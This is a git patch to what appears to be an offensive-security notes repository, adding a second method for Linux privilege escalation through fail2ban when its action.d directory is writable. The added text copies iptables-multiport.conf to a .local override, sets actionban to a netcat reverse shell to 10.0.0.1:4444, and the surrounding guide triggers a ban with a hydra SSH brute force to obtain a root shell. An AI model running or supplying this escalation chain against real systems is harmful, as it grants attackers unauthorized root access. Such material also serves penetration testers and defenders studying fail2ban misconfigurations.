From fe5173ecd3e16072d30f0ba8b551b1e002ccf90c Mon Sep 17 00:00:00 2001 From: 0xold <48367838+Old1337@users.noreply.github.com> Date: Mon, 16 Sep 2024 05:11:29 +0300 Subject: [PATCH] another method to escalate privileges when having write permission over conf.d directory --- .../sudo-fail2ban-privilege-escalation.md | 20 ++++++++++++++++++- 1 file changed, 19 insertions(+), 1 deletion(-) diff --git a/src/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation.md b/src/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation.md index 2f0f720..91b0334 100644 --- a/src/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation.md +++ b/src/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation.md @@ -66,6 +66,9 @@ Specifically, insert a payload to one of the following values. - **actionunban** Here update the value of **actionban** which triggers ban on multiple login attempts. + +Method 1 + Copy **iptables-multiport.conf** to the current user's home directory. ```sh @@ -91,6 +94,21 @@ Then move back the config file to the original one. mv ~/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf ``` +Method 2 + +Fail2ban parses .local files in the action.d directory after the .conf files, and any settings in the .local files override user changes made in the .conf files. + +```sh +# cp iptables-multiport.conf in the same directory with .local extension iptables-multiport.local +cp /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.local +``` + +We insert a reverse shell payload into the **actionban**. + +```sh +actionban = /usr/bin/nc 10.0.0.1 4444 -e /bin/bash +``` + To apply the new configuration, restart it as root. ```sh @@ -112,4 +130,4 @@ So that to, **hydra** is useful. hydra -l root -P passwords.txt ssh ``` -After a short time, you will get a root shell via listener. \ No newline at end of file +After a short time, you will get a root shell via listener.